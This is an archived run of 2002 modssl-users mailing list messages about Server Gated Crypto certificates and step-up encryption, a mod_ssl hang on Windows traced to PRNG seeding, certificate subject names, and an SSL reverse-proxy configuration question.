Subject: RE: OT: Encryption and Credit Card Processing (fwd)
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


---------- Forwarded message ----------
From: Geoff Thorpe 
Subject: RE: OT: Encryption and Credit Card Processing (fwd)
Resent-Subject: RE: OT: Encryption and Credit Card Processing (fwd)
Date: Wed, 29 May 2002 10:56:15 -0400 (EDT)
Resent-Date: Thu, 27 Jun 2002 14:22:36 -0400 (EDT)
Resent-From: "R. DuFresne" 
To: modssl-users@modssl.org
Resent-To: "R. DuFresne" 

Hi there,

On Wed, 29 May 2002, R. DuFresne wrote:

> Can others with more incite to verisign certs verify this information for
> me?  thanks in advance:

Dunno about the insightful, but I'll try instead ...

> In response to your question (see below) about surrogate/gated
> functionality built into the major browsers since Netscape and IE version
> 3, the answer is simple.  To address the global needs of the US financial
> community, the US Government agreed to this functionality for both domestic
> and exportable versions of the browser.  The Federal Government agreed to
> this provided the server that triggers the higher strength processing is
> operating in the US or Canada and a domestic commercial certificate
> authority (CA) with the capability of issuing such certificates is
> utilized. To my knowledge, only VeriSign can provide such certificates.  I
> have been involved with the installation of global certificates on
> Netscape, iPlanet, and IIS web servers since at least the first quarter of
> the Year 2000.  Initially, WebLogic servers could not handle global
> certificates even though BEA claimed its software did.  Once BEA completed
> its legal agreement with VeriSign, the issue was supposedly
> resolved.  While I expect that this is true, I have never validated it for
> myself.  I don't recall that an Apache web server could handle the Global
> certificates.  To function properly, the supplier of the web server must
> obtain special (export controlled) code from the issuing CA.

Apache-based servers can handle this - it requires a sufficient version of
OpenSSL, it has very little to do with apache nor even the ssl module (it
should make no difference between apache-ssl and mod_ssl, for example).
IIRC, configuration is a problem - because these SGC (Server Gated Crypto)
usually consist of a cert chain with an intermediate CA cert that is
unknown to browsers (it is in turn signed by a CA cert that *is* known to
browsers). So, you need to ensure the intermediate cert is also in the
server cert file (or was it the CA list? I forget ...)

One of the problems was that these certificates were being issued with one
or both of a "netscape" cert extension and a "microsoft" cert extension.
If your signed cert didn't contain the microsoft one, then you'd be fine
no matter which version of openssl you were running - in short, without
the microsoft extension present in the cert, even IE browsers would obey
the SSL protocol. With the microsoft extension present however, IE would
enter some deranged brain-state in which it thought it could simply make
up it's own new twist on the SSL protocol. This confused various servers
except IIS until everyone figured out what was going on with Microsoft's
creative side and developed workarounds for it - hence the point about
having a "sufficient" version of OpenSSL. All recent releases of OpenSSL
are OK and can cope with these brain-damaged SSL renegotiate hacks from
IE.

Whether you get a microsoft extension in your SGC cert or not probably
depends on the competency, care, and mood of Verisign - and as with all
things involving either microsoft and/or verisign, you probably need an
agreeable alignment of the planets too. IIRC, people running apache based
servers were being issued with SGC certs some of which contained the
microsoft extension and some of which didn't. Also, the intermediate
signing certificate varied quite frequently, so it wasn't possible to
hard-code a fixed set of intermediate certs as "trusted" - it was usually
necessary to treat the intermediate cert as part of the server-cert-chain.

But this is all rather moot, see below ...

> Note: I'm note exposing any secrets here.  You should be able to obtain
> this information freely from the VeriSign, Netscape, and Microsoft public
> web sites.  You just may have to dig for it awhile.

SGC certs are no longer required. It was only ever an issue for
export-crippled browsers anyway and those simply don't (or shouldn't)
exist any more. SGC also cost heaps more. Get a "normal" cert.

Cheers,
Geoff

-- 
Geoff Thorpe, geoff(at)geoffthorpe(dot)net

2000 years on, it's a different empire but the same
zealots and the same attrocities.


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 27 20:32:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA20430; Thu, 27 Jun 2002 20:31:51 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from darkstar.sysinfo.com id UAA20337; Thu, 27 Jun 2002 20:30:51 +0200 (MET DST)
Received: from localhost (dufresne@localhost)
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id OAA02749;
	Thu, 27 Jun 2002 14:31:30 -0400
Date: Thu, 27 Jun 2002 14:31:30 -0400 (EDT)
From: "R. DuFresne" 
To: Alex 
cc: modssl-users@modssl.org
Subject: Re: Off-Topic - Encryption and Credit Card Processing (resent) (fwd)
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users



---------- Forwarded message ----------
From: Kevin Steves 
Subject: Re: Off-Topic - Encryption and Credit Card Processing (resent)
Cc: 'Marc E. Mandel' , firewalls@lists.gnac.net,
     kevin@atomicgears.com
Date: Sun, 26 May 2002 16:23:00 -0700

On Sat, May 25, 2002 at 11:07:11AM +0200, Ben Nagy wrote:
> Netscape and MS appear to support "step-up" or "server gated"
> cryptography. Presumably any browser could (or they could have just not
> export crippled themselves in the first place). MS tries to take credit
> for it, but the history is unclear in the quick search I performed.

Netscape was the first to announce, as I recall.  MS SGC, initially
at least, did not conform to SSLv3, as they decided for performance
reasons to short-circuit the renegotiation protocol.

This is the Netscape press release:
http://wp.netscape.com/flash2/newsref/pr/newsrelease428.html

This is really all moot at this point, with the wide-spread
availability of non-crippled browsers.  I don't know why some
are still purchasing "128-bit SSL certificates".

Finally, this is dated (written shortly after the Netscape
announcement in 1997) but may be useful.  I think there are more
technical details (OIDs etc.) in a document in the mod_ssl
distribution.

                  Netscape Exportable 128-bit SSL Software

                    Kevin Steves 
                               Hewlett-Packard

                                   Summary

     Netscape recently received federal approval to export Netscape
     Communicator with 128-bit encryption to customers worldwide, and
     to export Netscape servers featuring 128-bit encryption to
     certified banks worldwide. There has been confusion regarding the
     technical details of this exportable 128-bit encryption method,
     due largely to the lack of published technical information from
     Netscape. This brief paper will describe the technical
     implementation details of the Netscape method for establishing a
     128-bit Secure Sockets Layer (SSL) session using an exportable
     Netscape client. This method has been referred to by Netscape
     personnel as step-up encryption. These details have been derived
     from public mailing lists and private e-mail with Netscape and HP
     employees.

SSL Handshake Protocol

SSL utilizes a handshake protocol to perform authentication and negotiate
cryptographic parameters. During the SSL handshake, the client and server
agree on a single cipher suite, which includes a key exchange algorithm, an
encryption algorithm (bulk cipher), a message digest for data integrity, and
a boolean identifying exportability. For example, the
SSL_RSA_EXPORT_WITH_RC4_40_MD5 cipher suite is exportable and specifies that
RSA is used for key exchange, 40-bit RC4 for bulk encryption, and MD5 for
data integrity.

The SSL client initiates the handshake by transmitting a hello message to
the server with a preference ordered list of cipher suites supported by the
client. The server will select one cipher suite from the client's list and
respond with its own hello message. Following is an abbreviated handshake
example in which an exportable SSL client transmits both a 40-bit RC4 and
40-bit RC2 cipher suite; the server selects the RC4 cipher suite.

     C->S: ClientHello(SSL_RSA_EXPORT_WITH_RC4_40_MD5,
                       SSL_RSA_EXPORT_WITH_RC2_CBC_40_MD5)
     S->C: ServerHello(SSL_RSA_EXPORT_WITH_RC4_40_MD5)
     S->C: Certificate(server_certificate)
     S->C: ServerHelloDone
     C->S: ClientKeyExchange
     C->S: Finished
     S->C: Finished

server_certificate is verified by the client via some local trust policy
(e.g. the certificate is signed by a trusted certifying authority).

SSL Session Renegotiation

SSL version 3 added the capability for a client or server to renegotiate, or
redo, the security parameters of an existing SSL session. This is typically
used during client authentication, where a client establishes a secure
connection to a server (with server authentication only), then requests a
document which requires client authentication, which is followed by a server
request to renegotiate the session and require the client to present a valid
certificate before the request is returned.

Step-up Encryption

Netscape's step-up encryption method utilizes special X.509 version 3
extensions agreed upon by Netscape and Verisign, a special Verisign global
certifying authority that is hardcoded into the Netscape executable, and SSL
session redo.

To utilize set-up encryption with an international browser, a company must
obtain an SSL version 3 compliant server than supports 128-bit encryption
(for Netscape servers this currently requires Netscape Enterprise Server
version 3.0; the reason is explained below), a Verisign global ID, and
Netscape Communicator version 4.0 or greater.

With these conditions satisfied, a sample handshake will proceed as follows:

     C->S: ClientHello(SSL_RSA_EXPORT_WITH_RC4_40_MD5,
                       SSL_RSA_EXPORT_WITH_RC2_CBC_40_MD5)
     S->C: ServerHello(SSL_RSA_EXPORT_WITH_RC4_40_MD5)
     S->C: Certificate(global_server_certificate)
     S->C: ServerHelloDone
     C->S: ClientKeyExchange
     C->S: Finished
     S->C: Finished

     C->S: ClientHello(SSL_RSA_WITH_RC4_128_MD5)
     S->C: ServerHello(SSL_RSA_WITH_RC4_128_MD5)
     S->C: Certificate(global_server_certificate)
     S->C: ServerHelloDone
     C->S: ClientKeyExchange
     C->S: Finished
     S->C: Finished

There are two complete SSL handshakes, one with an exportable cipher suite,
followed immediately by another with a 128-bit cipher suite. There are two
full handshakes because the SSL protocol requires that an in-progress
handshake be completed before a session can be renegotiated.

global_server_certificate is a certificate that contains the special X.509
v3 extensions and that has been signed by the Verisign global certifying
authority that is hardcoded into the Netscape executable. When a certificate
is received with the special extensions, it is handled specially by the
Netscape certificate verification code. Currently, in order for other CAs to
be added, a patch release of the client is required. If
global_server_certificate is verified properly, a second handshake with a
128-bit cipher suite will be initiated by the client (it transmits a second
ClientHello message).

Cipher Suite Selection

SSL_RSA_WITH_RC4_128_MD5 is not the only cipher suite that can be used to
established a non-weak SSL session using the step-up method. The freely
available Netscape Communicator 4.X products implement two strong cipher
suites: 128-bit RC4 (SSL_RSA_WITH_RC4_128_MD5) and triple DES
(SSL_RSA_WITH_3DES_EDE_CBC_SHA). The triple DES cipher suite uses 3
independent keys in encrypt-decrypt-encrypt mode for an effective key size
of 168-bits. SSL_RSA_WITH_IDEA_CBC_SHA is not currently implemented in
Communicator (IDEA is a 128-bit block cipher).

In the free exportable versions of Netscape Communicator 4.X, 128-bit RC4
and and triple DES are available, but may only be used when a global
certificate is presented by the server. In Communicator, if you select
Security->Navigator->Configure SSL v3 you will see that 128-bit RC4 and
triple DES are labeled When permitted, indicating they are not available for
use at all times. The second sample SSL handshake presented earlier could
proceed as follows if both of these cipher suites were configured:

     C->S: ClientHello(SSL_RSA_WITH_RC4_128_MD5,
                       SSL_RSA_WITH_3DES_EDE_CBC_SHA)
     S->C: ServerHello(SSL_RSA_WITH_3DES_EDE_CBC_SHA)
     S->C: Certificate(global_server_certificate)
     S->C: ServerHelloDone
     C->S: ClientKeyExchange
     C->S: Finished
     S->C: Finished

In this example, triple DES is used to establish the session in the second,
step-up handshake. Notice that SSL_RSA_WITH_RC4_128_MD5 is preferred by the
client over SSL_RSA_WITH_3DES_EDE_CBC_SHA (recall that the list or cipher
suites in the client hello is ordered according to preference). However the
server selected SSL_RSA_WITH_3DES_EDE_CBC_SHA for its server hello. This is
permitted by the protocol, and might be caused by a server that prefers the
triple DES cipher suite over 128-bit RC4, or by a server that does not
support RC4.

Netscape Communicator will order cipher suites according to the order they
are presented in the cipher suite selection dialog box. Netscape prefers RC4
over triple DES because of its speed, and they feel it's unlikely to be less
secure than 3DES (note that the work factor required to brute force a 3-key
DES key can be approximately equal to 112-bits of keyspace, due to a
meet-in-the-middle attack).

Netscape Enterprise Server 2.X Defect

No modifications to the SSL version 3 protocol are required for the step-up
encryption method to operate. However, a defect in the Netscape Enterprise
version 2.X servers prevents it from working. The 2.X servers will not
respond properly to a ClientHello message unless the server has sent a prior
HelloRequest message. HelloRequest is used by the server to initiate session
redo.
_______________________________________________
Firewalls mailing list
Firewalls@lists.gnac.net
For Account Management (unsubscribe, get/change password, etc) Please go to:
http://lists.gnac.net/mailman/listinfo/firewalls

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 27 20:59:21 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA23352; Thu, 27 Jun 2002 20:58:52 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id UAA23223; Thu, 27 Jun 2002 20:57:36 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id D5ADF4CE77D; Thu, 27 Jun 2002 20:57:33 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 122CE287DB; Thu, 27 Jun 2002 19:43:18 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from pscdev.com id RAA00699; Thu, 27 Jun 2002 17:54:12 +0200 (MET DST)
Received: from pete2 [205.229.222.70]
	by pscdev.com [205.229.222.77]
	with SMTP (MDaemon.PRO.v5.0.7.R)
	for ; Thu, 27 Jun 2002 11:56:53 -0400
Message-ID: <002e01c21df2$ca3f9190$46dee5cd@pete2>
From: "Peter Cronin" 
To: 
Subject: Apache mod_ssl hanging browser
Date: Thu, 27 Jun 2002 11:53:33 -0400
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_002B_01C21DD1.430DE670"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4807.1700
X-MIMEOLE: Produced By Microsoft MimeOLE V5.50.4807.1700
X-MDRemoteIP: 205.229.222.70
X-Return-Path: pcronin@psconcepts.com
X-MDaemon-Deliver-To: modssl-users@modssl.org
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Peter Cronin" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_002B_01C21DD1.430DE670
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

Was wondering if anyone can help me? I believe I have mod_ssl loaded =
correctly and configurd correctly, but I get the following situation =
when I access my SSL site.=20
- https://secure.aebdemo.com, it just hangs on site, but says host =
contacted...
- this is what the SSL.log says: It looks like it confgures ok for =
secure.aebdemo.com:443

[26/Jun/2002 22:01:53 02320] [info] Init: Configuring server =
secure.aebdemo.com:443 for SSL protocol

[26/Jun/2002 22:01:53 02404] [info] Server: Apache/1.3.26, Interface: =
mod_ssl/2.8.9, Library: OpenSSL/0.9.6d

[26/Jun/2002 22:01:53 02404] [warn] You are using mod_ssl under Win32. =
This combination is *NOT* officially supported. Use it at your own risk!

[26/Jun/2002 22:01:53 02404] [info] Init: 1st startup round (still not =
detached)

[26/Jun/2002 22:01:53 02404] [info] Init: Initializing OpenSSL library

[26/Jun/2002 22:01:53 02404] [info] Init: Loading certificate & private =
key of SSL-aware server secure.aebdemo.com:443

[26/Jun/2002 22:01:53 02404] [info] Init: Seeding PRNG with 136 bytes of =
entropy

[26/Jun/2002 22:01:53 02404] [info] Init: Generating temporary RSA =
private keys (512/1024 bits)

[26/Jun/2002 22:01:53 02404] [info] Init: Configuring temporary DH =
parameters (512/1024 bits)

[26/Jun/2002 22:01:53 02404] [info] Init: Seeding PRNG with 136 bytes of =
entropy

[26/Jun/2002 22:01:53 02404] [info] Init: Configuring temporary RSA =
private keys (512/1024 bits)

[26/Jun/2002 22:01:53 02404] [info] Init: Configuring temporary DH =
parameters (512/1024 bits)

[26/Jun/2002 22:01:53 02404] [info] Init: Initializing (virtual) servers =
for SSL

[26/Jun/2002 22:01:53 02404] [info] Init: Configuring server =
secure.aebdemo.com:443 for SSL protocol

[26/Jun/2002 22:02:02 02404] [info] Connection to child 0 established =
(server secure.aebdemo.com:443, client 205.229.222.70)

[26/Jun/2002 22:02:02 02404] [info] Seeding PRNG with 0 bytes of entropy


My current configuration is:
Windows 2000 SP2
Apache 1.3.26
mod_ssl 2.8.9
openssl .0.9.6d

my configuration in httpd.conf is:
SSLMutex sem
SSLRandomSeed startup builtin
SSLRandomSeed connect builtin
SSLSessionCache none
SSLLog logs/SSL.log
SSLLoglevel info

NameVirtualHost 205.229.222.9:443


Port 443
ServerName secure.aebdemo.com
DocumentRoot d:/data/lm
ErrorLog logs/secureaeb-error_log
CustomLog logs/secureaeb-access_log combined
SSLEngine On
SSLCertificateFile conf/ssl/secure.aebdemo.com.cert
SSLCertificateKeyFile conf/ssl/secure.aebdemo.com.key


Any help would be appreciated.


Peter S. Cronin
Plexsys Technologies, Inc
http://www.psconcepts.com
732-280-9550

------=_NextPart_000_002B_01C21DD1.430DE670
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable









Was wondering if anyone can help me? I =
believe I=20
have mod_ssl loaded correctly and configurd correctly, but I get the =
following=20
situation when I access my SSL site. 


- https://secure.aebdemo.com, it =
just hangs=20
on site, but says host contacted...


- this is what the SSL.log says: It =
looks like it=20
confgures ok for secure.aebdemo.com:443


 




[26/Jun/2002 22:01:53 02320] [info] Init: Configuring server=20
secure.aebdemo.com:443 for SSL protocol


[26/Jun/2002 22:01:53 02404] [info] Server: Apache/1.3.26, Interface: =

mod_ssl/2.8.9, Library: OpenSSL/0.9.6d


[26/Jun/2002 22:01:53 02404] [warn] You are using mod_ssl under =
Win32. This=20
combination is *NOT* officially supported. Use it at your own risk!


[26/Jun/2002 22:01:53 02404] [info] Init: 1st startup round (still =
not=20
detached)


[26/Jun/2002 22:01:53 02404] [info] Init: Initializing OpenSSL =
library


[26/Jun/2002 22:01:53 02404] [info] Init: Loading certificate & =
private=20
key of SSL-aware server secure.aebdemo.com:443


[26/Jun/2002 22:01:53 02404] [info] Init: Seeding PRNG with 136 bytes =
of=20
entropy


[26/Jun/2002 22:01:53 02404] [info] Init: Generating temporary RSA =
private=20
keys (512/1024 bits)


[26/Jun/2002 22:01:53 02404] [info] Init: Configuring temporary DH =
parameters=20
(512/1024 bits)


[26/Jun/2002 22:01:53 02404] [info] Init: Seeding PRNG with 136 bytes =
of=20
entropy


[26/Jun/2002 22:01:53 02404] [info] Init: Configuring temporary RSA =
private=20
keys (512/1024 bits)


[26/Jun/2002 22:01:53 02404] [info] Init: Configuring temporary DH =
parameters=20
(512/1024 bits)


[26/Jun/2002 22:01:53 02404] [info] Init: Initializing (virtual) =
servers for=20
SSL


[26/Jun/2002 22:01:53 02404] [info] Init: Configuring server=20
secure.aebdemo.com:443 for SSL protocol


[26/Jun/2002 22:02:02 02404] [info] Connection to child 0 established =
(server=20
secure.aebdemo.com:443, client 205.229.222.70)


[26/Jun/2002 22:02:02 02404] [info] Seeding PRNG with 0 bytes of=20
entropy


 


My current configuration =
is:


Windows 2000 SP2


Apache 1.3.26


mod_ssl 2.8.9


openssl .0.9.6d


 


my configuration in httpd.conf =
is:




SSLMutex sem
SSLRandomSeed startup builtin
SSLRandomSeed =
connect=20
builtin
SSLSessionCache none
SSLLog logs/SSL.log
SSLLoglevel=20
info




NameVirtualHost 205.229.222.9:443




<VirtualHost 205.229.222.9:443>
Port 443
ServerName=20
secure.aebdemo.com
DocumentRoot d:/data/lm
ErrorLog=20
logs/secureaeb-error_log
CustomLog logs/secureaeb-access_log=20
combined
SSLEngine On
SSLCertificateFile=20
conf/ssl/secure.aebdemo.com.cert
SSLCertificateKeyFile=20
conf/ssl/secure.aebdemo.com.key
</VirtualHost>


Any help would be =
appreciated.


 


 


Peter S. Cronin
Plexsys =
Technologies, Inc
http://www.psconcepts.com
732-2=
80-9550


------=_NextPart_000_002B_01C21DD1.430DE670--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 27 21:03:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA23808; Thu, 27 Jun 2002 21:02:43 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from mm02snlnto.sandia.gov id VAA23730; Thu, 27 Jun 2002 21:01:56 +0200 (MET DST)
Received: from 132.175.109.4 by mm02snlnto.sandia.gov with ESMTP (
 Tumbleweed MMS SMTP Relay (MMS v4.7)); Thu, 27 Jun 2002 12:59:33 -0600
X-Server-Uuid: 95b8ca9b-fe4b-44f7-8977-a6cb2d3025ff
Received: from es08snlnt.sandia.gov (es08snlnt.sandia.gov
 [134.253.130.11]) by mailgate2.sandia.gov (8.12.3/8.12.3) with ESMTP id
 g5RJ1q2B016773 for ; Thu, 27 Jun 2002 13:01:52
 -0600 (MDT)
Received: by es08snlnt.sandia.gov with Internet Mail Service (
 5.5.2653.19) id ; Thu, 27 Jun 2002 13:01:53 -0600
Message-ID: 
From: "Ashmore, Samuel R" 
To: "'modssl-users@modssl.org'" 
Subject: Alternative Subject name
Date: Thu, 27 Jun 2002 13:01:52 -0600
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
X-Filter-Version: 1.8 (sass2426)
X-WSS-ID: 1105BF1F94458-01-01
Content-Type: text/plain; 
 charset=iso-8859-1
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ashmore, Samuel R" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Is there any way to get to the alternative subject name from another module
or a CGI without parsing the entire certificate from the SSL_CLIENT_CERT
variable?

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 27 21:57:18 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA00643; Thu, 27 Jun 2002 21:56:30 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from relais.videotron.ca id VAA00574; Thu, 27 Jun 2002 21:55:57 +0200 (MET DST)
Received: from toilet ([24.202.164.28]) by relais.videotron.ca
          (Videotron-Netscape Messaging Server v4.15 MTA-PRD2) with ESMTP
          id GYDRD702.B7Q for ; Thu, 27 Jun 2002
          15:55:55 -0400 
Received: from toilet
	([127.0.0.1] helo=localhost ident=geoff)
	by toilet with esmtp (Exim 3.35 #1 (Debian))
	id 17NfMw-000195-00; Thu, 27 Jun 2002 15:55:54 -0400
Date: Thu, 27 Jun 2002 15:55:54 -0400 (EDT)
From: Geoff Thorpe 
X-X-Sender: geoff@toilet.localnet
To: modssl-users@modssl.org
Subject: Re: Apache mod_ssl hanging browser
In-Reply-To: <002e01c21df2$ca3f9190$46dee5cd@pete2>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Geoff Thorpe 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

On Thu, 27 Jun 2002, Peter Cronin wrote:

> Was wondering if anyone can help me? I believe I have mod_ssl loaded
> correctly and configurd correctly, but I get the following situation
> when I access my SSL site.
> - https://secure.aebdemo.com, it just hangs on site, but says host contacted...
> - this is what the SSL.log says: It looks like it confgures ok for secure.aebdemo.com:443

[snip]

> [26/Jun/2002 22:02:02 02404] [info] Connection to child 0 established (server secure.aebdemo.com:443, client 205.229.222.70)
>
> [26/Jun/2002 22:02:02 02404] [info] Seeding PRNG with 0 bytes of entropy

[snip]

> my configuration in httpd.conf is:
> SSLMutex sem
> SSLRandomSeed startup builtin
> SSLRandomSeed connect builtin
> SSLSessionCache none

[snip]

It would appear you may have a PRNG problem, and given that you're running
on some variant of windows, it wouldn't surprise me in the least. I don't
know much (read: anything) about mod_ssl's operation under win32, but one
way for you to find out *if* this what's causing your problems, try using
some largish file (eg. 32Kb or bigger should certainly be enough) and
feeding that into SSLRandomSeed, ie. replace "builtin" in both of those
lines with "file:".

If that works, don't leave it like that as it represents a security risk.
However, it would at least tell you if a working source of entropy for the
PRNG is all that separates you from a functioning system, otherwise the
problem lies elsewhere. As for a working PRNG solution on windows that you
*could* use in production ... good question ... you may want to ask that
separately on this list as/when you know if it's the problem. Lutz is on
this list, he'd have a better chance of answering such a question than I.

Cheers,
Geoff


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 27 23:32:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA10397; Thu, 27 Jun 2002 23:31:30 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from hotmail.com id XAA10392; Thu, 27 Jun 2002 23:31:07 +0200 (MET DST)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Thu, 27 Jun 2002 14:31:01 -0700
X-Originating-IP: [209.139.218.221]
From: "Michael" 
To: 
References: <3D1ACB9F.16587.42819858@localhost>
Subject: Re: Reverse Proxy https question
Date: Thu, 27 Jun 2002 14:29:12 -0700
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Message-ID: 
X-OriginalArrivalTime: 27 Jun 2002 21:31:01.0218 (UTC) FILETIME=[EEFE1C20:01C21E21]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Michael" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

As I understand SSL, the packet headers remain unencrypted , the content is
encrypted. Hence the ability of routers throughout the Internet to route SSL
packets.


----- Original Message -----
From: "Aryeh Katz" 
To: 
Sent: Thursday, June 27, 2002 05:23
Subject: Re: Reverse Proxy https question


> I don't understand something.
> If the Apache proxy server is not going to decrypt the packets, how will
it know where to send it?
> Aryeh
> > I am trying to Reverse ProxyHTTPS connections in the following
> > manner:
> >
> > CLIENT Browser (https://secure-site.com) -> Apache 2.0 Reverse Proxy,
> > posing as secure-site.com (non-ssl, non-decrypting, just passing the
> > https through) -> Sonicwall SSL Accelerator (a stand-alone HW device
> > for SSL decryption/encryption, hosting the certificate forsecure-
> > site.com, decrypting the SSL connection) -> WEBSERVER (non-SSL)
> >
> > The purpose for this design is to keep the webserver behind a layer of
> > switches (for VLANS and ACLS) and Cisco Content Servers (which act as
> > a router and load balancer) and keep the Apache proxy server as the
> > "edge presence" of the website.
> >
> > What happens with this configuration is:
> > 1) The client browser connects to the Apache proxy
> > 2) The Apache proxy server connects to the SSL accelerator with HTTPS
> > sucessfully, as seen in the debug-level Apache log files. 3) The
> > browser waits, waits and waits... 4) The Apache proxy sits, sits and
> > sits. 5) The Webserver DOES see the non-ssl connection. The
> > information in the access log is:
> >  "Client IPAddress- - [25/Jun/2002:17:04:18 -0700] "?L /
> > HTTP/1.0" 302 0 "
> > 5) Eventually the client browser gives up and times out.
> >
> > If I install the certificate for secure-site.com on the Apache
> > reverse proxy server and enable SSL, then the Apache reverse proxy
> > will connect with SSL to both the browser and the downstream
> > webserver. This works, but is pointless as it loads the Proxy server's
> > CPU with SSL encryption/decryption. That's what we have the SSL
> > accelerators for.
> >
> >
> > What is missing in my config? Is this setup even possible?
> > Any comments?
> >
> > Thanks in advance.
> >
> > -Michael
> >
> >
> > --------------
> >
> >
> > This is the Apache config I am using:
> > ----------
> > Listen IPAddress:443
> > LogLevel debug
> > 
> >  SSLProxyEngine On
> >  ServerName web-site
> >  ProxyPass / https://secure-site.com
> >  ProxyPassReverse / https://secure-site.com
> > 
> >
> >
> > ------------
> > Server version: Apache/2.0.39
> > Server built: Jun 25 2002 16:11:49
> >
> > -----------
> > Compiled in modules:
> >  core.c
> >  mod_access.c
> >  mod_auth.c
> >  mod_include.c
> >  mod_log_config.c
> >  mod_env.c
> >  mod_setenvif.c
> >  mod_proxy.c
> >  proxy_connect.c
> >  proxy_ftp.c
> >  proxy_http.c
> >  mod_ssl.c
> >  prefork.c
> >  http_core.c
> >  mod_mime.c
> >  mod_status.c
> >  mod_autoindex.c
> >  mod_asis.c
> >  mod_cgi.c
> >  mod_negotiation.c
> >  mod_dir.c
> >  mod_imap.c
> >  mod_actions.c
> >  mod_userdir.c
> >  mod_alias.c
> >  mod_so.c
> >
> >
> >
>
>
> ---
> Aryeh Katz
> VASCO
> www.vasco.com
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 27 23:45:20 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA11925; Thu, 27 Jun 2002 23:44:39 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
